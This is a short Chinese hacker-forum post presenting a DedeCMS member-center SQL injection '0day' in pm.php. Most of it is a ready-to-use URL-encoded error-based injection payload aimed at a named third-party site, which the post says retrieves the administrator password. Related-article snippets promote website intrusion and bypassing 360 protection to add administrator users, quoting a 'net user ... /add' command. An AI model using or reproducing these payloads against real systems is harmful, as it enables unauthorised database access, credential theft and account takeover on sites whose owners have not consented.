DedeCMS会员中心短消息SQL注射0day漏洞

hacker5年前黑客文章1079

需要:magic_quotes_gpc = Off
DedeCMS会员中心短消息SQL注射漏洞,成功利用此漏洞可获得管理员密码:

http://www.chncto.com/de/member/pm.php?dopost=read&id=1

%27%20and%20@%60%27%60%20and%20

%28SELECT%201%20FROM%20%28select

%20count%28*%29,concat%28floor%28rand

%280%29*2%29,%28substring%28%28Select%20%28

version%28%29%29%29,1,62%29%29%29a

%20from%20information_schema.tables

%20group%20by%20a%29b%29%20and%20%27

标签: 黑客技术

相关文章

入侵指定网站 常用的几种方法

首先,观察指定网站。 入侵指定网站是需要条件的: 要先观察这个网站是动态还是静态的。 首先介绍下什么样站点可以入侵:我认为必须是动态的网站 如ASP、PHP、 JSP等代码编写的站点 如果是静态的...

如何检测自己是否成为肉鸡_检测自己成为肉鸡的方法

如何检测自己是否成为肉鸡的方法,注意以下几种基本的情况: 1:QQ、MSN的异常登录提醒 (系统提示上一次的登录IP不符) 2:网络游戏登录时发现装备丢失或与上次下线时的位置不符,甚至...

突破360防黑加固添加用户

突破360防黑加固添加用户

360功能多,现在大多管理员图省事喜欢安个360。360有个防黑加固功能比较坑爹,提权的时候经常会用到net user xxx xxx /add&net localgroup xxx xx...

专用工具完全免费使用方法

专用工具完全免费使用方法

什么叫Inssider? Inssider是一种wifi网络扫描枪,致力于摆脱NetStumbler的别的专用工具的局限。Inssider能够 随時间追踪接收灵敏度,开启无线接入点并应用GPS纪录储...

SAINT是不是适用全部电脑操作系统?

SAINT是不是适用全部电脑操作系统?

什么叫SAINT? SAINT是一种付钱商品,能够 将安全内容自动化技术协议书(SCAP)标准做为历经身份认证的系统漏洞,没经身份认证的漏洞检测程序流程和补丁下载扫描仪程序流程出示适用。SAINT扫...

详解测试IP地址的几个命令

如果你是一位网络管理员或者是一位普通的拨号用户,可能经常会遇到这样一种情形,那就是访问某一个网站时可能会花费好长时间,或者根本就无法访问需要的网站,这样我们许多宝贵的时间就消耗在等待上了。那我们有没有...